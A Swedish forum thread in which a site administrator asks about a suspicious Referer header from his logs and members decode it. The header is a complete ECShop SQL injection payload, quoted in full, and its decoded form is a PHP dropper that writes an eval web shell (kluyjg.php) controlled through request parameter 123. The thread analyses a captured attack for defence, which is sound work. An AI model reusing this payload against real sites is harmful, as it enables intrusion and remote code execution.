Vad försöker den här headern göra?

Permalänk
Medlem

Vad försöker den här headern göra?

Råkade titta lite i loggarna för en av jobbets siter och såg en massa requests med en konstig referrer-header. Anropet kommer antagligen från nån bot som fiskar svaghetern för den verkade leta efter vissa specifika sidor/filer. Funderar på vad det här referrer:n kan göra? Ser ut som nån sorts försök till sql injection? Och varför sätta det i referrer headern och inte i nån query eller nåt?

45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:569:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32747364586c715a7935776148416e4c4363385033426f6343426a6247467a63794248595530784d475a424e53423749484231596d78705979426d6457356a64476c766269426658324e76626e4e30636e566a6443676b5344647464545970657942415a585a68624367694c797061527a5636613235535a6c4e724b6938694c6952494e3231314e69346949696b3749483139626d563349456468545445775a6b45314b435266556b565256555654564673784d6a4e644b54732f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

Visa signatur

"Say unto thine own heart, I am mine own redeemer"
Don't touch me when I'm crazy of that airplane glue

Permalänk
Medlem

jag lite nyfiken och körde den i AI-sökmaskin och fick svaret:

"Den här headern innehåller en skadlig SQL-injektionsattack. Jag rekommenderar starkt att du inte kör eller använder den här koden, eftersom den är avsedd att exploatera sårbarheter i databaser och webbapplikationer.
SQL-injektionsattacker är en allvarlig säkerhetsrisk som kan leda till obehörig åtkomst, dataförlust och andra skador på system. Några viktiga punkter om SQL-injektion:
Det är en teknik där angripare försöker infoga skadlig SQL-kod i applikationens databas-queries.
Målet är ofta att kringgå autentisering, hämta känslig data eller manipulera databasen.
Det utnyttjar bristfällig inmatningsvalidering i applikationer.
Kan ge angripare full kontroll över databasen i värsta fall.
Förebyggs genom säker kodning, parameteriserade queries och input-validering.
Istället för att använda sådana skadliga tekniker, rekommenderar jag att fokusera på etisk och laglig säkerhetstestning med tillstånd från systemägaren. Det finns många legitima sätt att förbättra säkerheten i system utan att använda skadliga metoder."

Nu väntar jag ivrigt på någon som kan sånt här som kan verifiera eller vederlägga det AI påstår, man kan ju som bekant inte alltid lita på dess svar.

Visa signatur

MSI X670E Gaming Plus, AMD Ryzen 7 7800X3D
AMD XFX Radeon RX 7800 XT Speedster MERC 319 Black,
32GB Corsair vengeance 6000MHz CL30, Arctic Freezer III 280
Samsung Odyssey G7 Neo "32
Phanteks XT Pro Ultra chassi. OpenSuse Tumbleweed Linux/Windows 11.

Permalänk
Hedersmedlem

https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2...

Lite tunt med detaljer på Engelska vad jag kan hitta men det verkar vara någon slags SQL-injektion i någon kinesisk e-butik-grejsimojs, antagligen något som hanterar REFERER-header felaktigt i någon form av analysskript.

Den som vill läsa på kinesiska kan läsa här för en närmare förklaring: https://paper.seebug.org/691/ Men det tänker jag inte göra

Permalänk
Skrivet av DarkBob:

Råkade titta lite i loggarna för en av jobbets siter och såg en massa requests med en konstig referrer-header. Anropet kommer antagligen från nån bot som fiskar svaghetern för den verkade leta efter vissa specifika sidor/filer. Funderar på vad det här referrer:n kan göra? Ser ut som nån sorts försök till sql injection? Och varför sätta det i referrer headern och inte i nån query eller nåt?

45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:569:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657 274286261736536345f6465636f646528275a6d6c735a563977645852665932 39756447567564484d6f4a32747364586c715a7935776148416e4c436338503 3426f6343426a6247467a63794248595530784d475a424e5342374948423159 6d78705979426d6457356a64476c766269426658324e76626e4e30636e566a6 443676b5344647464545970657942415a585a68624367694c797061527a5636 613235535a6c4e724b6938694c6952494e3231314e69346949696b3749483139 626d563349456468545445775a6b45314b435266556b5652565556545646737 84d6a4e644b54732f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

Jag antog att det var UTF-8 som var kodat i hexadecimal så då blev det följande hos https://onlinetools.com/utf8/convert-hexadecimal-to-utf8:

2d312720554e494f4e2f2a = -1' UNION/*

7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c 735a56397764585266593239756447567564484d6f4a32747364586c715a793577 6148416e4c4363385033426f6343426a6247467a63794248595530784d475a424e 53423749484231596d78705979426d6457356a64476c766269426658324e76626e 4e30636e566a6443676b5344647464545970657942415a585a68624367694c7970 61527a5636613235535a6c4e724b6938694c6952494e3231314e69346949696b37 49483139626d563349456468545445775a6b45314b435266556b56525655565456 4673784d6a4e644b54732f506963702729293b2f2f7d787878 = {$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMo J2tsdXlqZy5waHAnLCc8P3BocCBjbGFzcyBHYU0xMGZBNSB7IHB 1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkSDdtdTYpeyBAZXZ hbCgiLypaRzV6a25SZlNrKi8iLiRIN211Ni4iIik7IH19bmV3IEdhTTEw ZkE1KCRfUkVRVUVTVFsxMjNdKTs/Picp'));//}xxx

Sedan användes https://www.base64decode.org/ för att avkoda base64:

ZmlsZV9wdXRfY29udGVudHMoJ2tsdXlqZy5waHAnLCc8P3BocCBjbGFzcy BHYU0xMGZBNSB7IHB1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkSD dtdTYpeyBAZXZhbCgiLypaRzV6a25SZlNrKi8iLiRIN211Ni4iIik7IH19bmV3 IEdhTTEwZkE1KCRfUkVRVUVTVFsxMjNdKTs/Picp = file_put_contents('kluyjg.php','<?php class GaM10fA5 { public function __construct($H7mu6) { @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST[123]);?>')

Så denna PHP-kod:

file_put_contents('kluyjg.php',' <?php class GaM10fA5 { public function __construct($H7mu6) { @eval("/*ZG5zknRfSk*/".$H7mu6.""); } } new GaM10fA5($_REQUEST[123]);?>');

Base64 på den utkommenterade base64-strängen inuti eval-funktionen:
ZG5zknRfSk = dnst_J

Längre än så kom jag inte!

Mvh,
WKF.

Visa signatur

"Den säkraste koden är den som aldrig skrivs"
"Visste du förresten att det är ett mångmiljardbolag?"
"Jag lever inte för att koda utan kodar för att sen kunna leva"

Permalänk
Medlem
Skrivet av WebbkodsFrilansaren:

Jag antog att det var UTF-8 som var kodat i hexadecimal så då blev det följande hos https://onlinetools.com/utf8/convert-hexadecimal-to-utf8:

2d312720554e494f4e2f2a = -1' UNION/*

7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c 735a56397764585266593239756447567564484d6f4a32747364586c715a793577 6148416e4c4363385033426f6343426a6247467a63794248595530784d475a424e 53423749484231596d78705979426d6457356a64476c766269426658324e76626e 4e30636e566a6443676b5344647464545970657942415a585a68624367694c7970 61527a5636613235535a6c4e724b6938694c6952494e3231314e69346949696b37 49483139626d563349456468545445775a6b45314b435266556b56525655565456 4673784d6a4e644b54732f506963702729293b2f2f7d787878 = {$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMo J2tsdXlqZy5waHAnLCc8P3BocCBjbGFzcyBHYU0xMGZBNSB7IHB 1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkSDdtdTYpeyBAZXZ hbCgiLypaRzV6a25SZlNrKi8iLiRIN211Ni4iIik7IH19bmV3IEdhTTEw ZkE1KCRfUkVRVUVTVFsxMjNdKTs/Picp'));//}xxx

Sedan användes https://www.base64decode.org/ för att avkoda base64:

ZmlsZV9wdXRfY29udGVudHMoJ2tsdXlqZy5waHAnLCc8P3BocCBjbGFzcy BHYU0xMGZBNSB7IHB1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkSD dtdTYpeyBAZXZhbCgiLypaRzV6a25SZlNrKi8iLiRIN211Ni4iIik7IH19bmV3 IEdhTTEwZkE1KCRfUkVRVUVTVFsxMjNdKTs/Picp = file_put_contents('kluyjg.php','<?php class GaM10fA5 { public function __construct($H7mu6) { @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST[123]);?>')

Så denna PHP-kod:

file_put_contents('kluyjg.php',' <?php class GaM10fA5 { public function __construct($H7mu6) { @eval("/*ZG5zknRfSk*/".$H7mu6.""); } } new GaM10fA5($_REQUEST[123]);?>');

Base64 på den utkommenterade base64-strängen inuti eval-funktionen:
ZG5zknRfSk = dnst_J

Längre än så kom jag inte!

Mvh,
WKF.

Jag skickade i min tur in php-scriptet du har skrivit ut här i chatgpt 😂

A new class named GaM10fA5 is defined. This class contains a constructor (__construct) that takes a single parameter, $H7mu6.

Security Implications

This script is a typical PHP backdoor often used by attackers to inject and run arbitrary code on a compromised server. Here’s why it’s dangerous:

The eval() function executes any code passed in the HTTP request parameter 123. This means an attacker could send any PHP code through the 123 parameter and have it executed on the server.
Such code can be used to perform malicious actions, such as uploading additional backdoor files, retrieving sensitive information, or executing shell commands.